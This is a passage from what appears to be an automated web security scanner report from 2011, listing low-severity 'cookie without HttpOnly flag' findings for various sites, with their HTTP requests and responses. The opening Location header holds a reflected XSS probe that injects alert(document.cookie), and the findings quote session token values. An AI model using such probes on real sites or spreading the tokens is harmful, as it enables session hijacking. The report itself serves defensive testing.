Location: http://kickapps.yuku.com/kickFlash/KickShell.swf?referralUrl=http://www.parenthood.com/?d1907'-alert(document.cookie)-'807a8eb3eff=1&widgetHost=kickapps.yuku.com&buildVersion=1.0.589
Content-Length: 0
Cache-Control: max-age=7776000
Expires: Mon, 25 Apr 2011 02:22:41 GMT
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8


14.10. http://community.parenthood.com/service/searchEverythingAsRss.kickAction

Summary

Severity:   Low
Confidence:   Firm
Host:   http://community.parenthood.com
Path:   /service/searchEverythingAsRss.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=06B8E490B1776258A19B5A486998A63C; Path=/
  • as=40337; Expires=Wed, 26-Jan-2011 04:28:40 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=phnew&includeVideo=on&includeBlog=on&as=40337&quantity=25 HTTP/1.1
Host: community.parenthood.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=CFC4B8F899936FBC1C797C6C4BB2DD5A

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:28:41 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=06B8E490B1776258A19B5A486998A63C; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 04:28:40 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 140035

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...

14.11. http://dev.piwik.org/trac/browser/trunk/js/piwik.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dev.piwik.org
Path:   /trac/browser/trunk/js/piwik.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • trac_form_token=9da015a43e17e45b1ae1c20c; Path=/trac
  • trac_session=00dd58280c5f5faa118229b7; expires=Sun, 24-Apr-2011 22:31:20 GMT; Path=/trac
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trac/browser/trunk/js/piwik.js HTTP/1.1
Host: dev.piwik.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:31:18 GMT
Server: Apache
Cache-control: must-revalidate
Content-Length: 243586
Set-Cookie: trac_form_token=9da015a43e17e45b1ae1c20c; Path=/trac
Set-Cookie: trac_session=00dd58280c5f5faa118229b7; expires=Sun, 24-Apr-2011 22:31:20 GMT; Path=/trac
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>
/tr
...[SNIP]...

14.12. http://disqus.com/logout/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://disqus.com
Path:   /logout/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • sessionid=14f475985dbe55d9847842e30e42796e; Domain=.disqus.com; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /logout/ HTTP/1.1
Host: disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 FOUND
Date: Mon, 24 Jan 2011 22:31:34 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
Set-Cookie: sessionid=14f475985dbe55d9847842e30e42796e; Domain=.disqus.com; Path=/
Location: http://disqus.com/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8


14.13. http://fastdial.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fastdial.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: fastdial.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:03:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESScb6e13bb9b3cdf11f80b4ccf0f07b677=c1uvnu853h51tppmts56d4vm81; expires=Thu, 17-Feb-2011 05:36:34 GMT; path=/; domain=.fastdial.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:03:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 5182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

14.14. http://help.tweetmeme.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=jcahvhmi593kcks9omcs8qbp63; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.15. http://help.tweetmeme.com/2009/04/07/api-documentation/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /2009/04/07/api-documentation/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/07/api-documentation/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=fri7ds4g5e569ab52b67udmd34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.16. http://help.tweetmeme.com/2009/04/09/rss-feeds/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/rss-feeds/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/09/rss-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:01:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dea45f6dnud0kld58ppcjlmap1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.17. http://help.tweetmeme.com/2009/04/09/twitter-feeds/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /2009/04/09/twitter-feeds/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2009/04/09/twitter-feeds/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6fjaaa6od3bhvj75ou4s3p06f2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.18. http://help.tweetmeme.com/contact/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /contact/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=p918mp9o4urak293n2lk14io61; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.19. http://help.tweetmeme.com/faq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /faq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=51pq19d4c1b2qs6s0igekjgic3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /faq HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 15:02:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=51pq19d4c1b2qs6s0igekjgic3; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 15:02:38 GMT
Location: http://help.tweetmeme.com/faqs/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14.20. http://help.tweetmeme.com/language/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://help.tweetmeme.com
Path:   /language/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /language/ HTTP/1.1
Host: help.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:02:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Served-By: doveweb
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=evippa6a47912f617v4ke1qlu5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://help.tweetmeme.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

14.21. http://investor.autobytel.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://investor.autobytel.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
  • ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: investor.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 24 Jan 2011 22:38:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: ABTL_SESSION=1141928628%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C%20%7Bts%20%272011%2D01%2D24%2017%3A38%3A10%27%7D%7C60ECCF3B67CEBC540B254D5622D5AEF8;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_BRIEFCASE=UPDATED%7C40477%2E734838;domain=investor.autobytel.com;expires=Tue, 24-Jan-2012 22:38:10 GMT;path=/
Set-Cookie: ABTL_PREVIEW=;expires=Sun, 24-Jan-2010 22:38:10 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Overview ><
...[SNIP]...

14.22. http://justintadlock.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://justintadlock.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=kfd834f75ot3daptl2mcnd6513; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justintadlock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:38:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Pingback: http://justintadlock.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=kfd834f75ot3daptl2mcnd6513; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24229

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...

14.23. http://justintadlock.com/archives/2008/04/13/cleaner-wordpress-gallery-plugin

Summary

Severity:   Low
Confidence:   Firm
Host:   http://justintadlock.com
Path:   /archives/2008/04/13/cleaner-wordpress-gallery-plugin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • PHPSESSID=8amjiosi47eb6750jiujeqgbd3; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /archives/2008/04/13/cleaner-wordpress-gallery-plugin HTTP/1.1
Host: justintadlock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:27:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://justintadlock.com/?p=801>; rel=shortlink
Pragma: no-cache
X-Pingback: http://justintadlock.com/blog/xmlrpc.php
Set-Cookie: PHPSESSID=8amjiosi47eb6750jiujeqgbd3; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575149

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...

14.24. http://kickapps.yuku.com/kickapps/service/getWidget.kickAction

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kickapps.yuku.com
Path:   /kickapps/service/getWidget.kickAction

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; Path=/
  • as=40337; Expires=Wed, 26-Jan-2011 02:22:44 GMT; Path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kickapps/service/getWidget.kickAction?widgetId=21535&as=40337 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://community.parenthood.com/kickapps/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:22:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; Path=/
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:22:44 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 3223
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/plain; charset=UTF-8

{"adBuyOut":true,"cs_rwid":"4a2e9fce1f0e074b","cs_wid":"","feedAkHost":"community.parenthood.com","r":"kfl1-1","serverSideError":"","ssoLoginUrl":"","ssoRegisterUrl":"","widgetAkHost":"community.paren
...[SNIP]...

14.25. http://lesterchan.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://lesterchan.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
  • wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
  • wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lesterchan.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 SVN/1.6.15 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://lesterchan.net/xmlrpc.php
Set-Cookie: PHPSESSID=4c415ee2862c176ec82733815b99874f; path=/
Set-Cookie: wpthisvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit=1295937552; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_posts=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Set-Cookie: wplastvisit_comments=0; expires=Sat, 07-Jan-2012 03:59:12 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Lester Chan
...[SNIP]...

14.26. http://mad4milk.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://mad4milk.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mad4milk.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:46 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22bb984950eed1af353727ed1e76937777%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1295908788%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Tue, 25-Jan-2011 00:39:48 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta http-e
...[SNIP]...

14.27. http://netvouz.com/action/submitBookmark

Summary

Severity:   Low
Confidence:   Firm
Host:   http://netvouz.com
Path:   /action/submitBookmark

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /action/submitBookmark HTTP/1.1
Host: netvouz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:42 GMT
Server: IBM_HTTP_Server
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: JSESSIONID=0000e0ie9rZuNgE43J-9RQD-aOC:-1; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5096


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...

14.28. http://news.cnet.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://news.cnet.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
  • arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:25:29 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app6.cnet.com:8923 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Tue, 25 Jan 2011 14:26:59 GMT
Age: 30
Content-Type: text/html; charset=UTF-8
Set-Cookie: tempSessionId=Cg5gn00+3VmtwdbzK1U; domain=.cnet.com; path=/; expires=Fri, 22-Jan-2021 14:25:29 GMT
Set-Cookie: arrowLat=1295965529634; domain=.cnet.com; path=/; expires=Wed, 25-Jan-2012 14:25:29 GMT
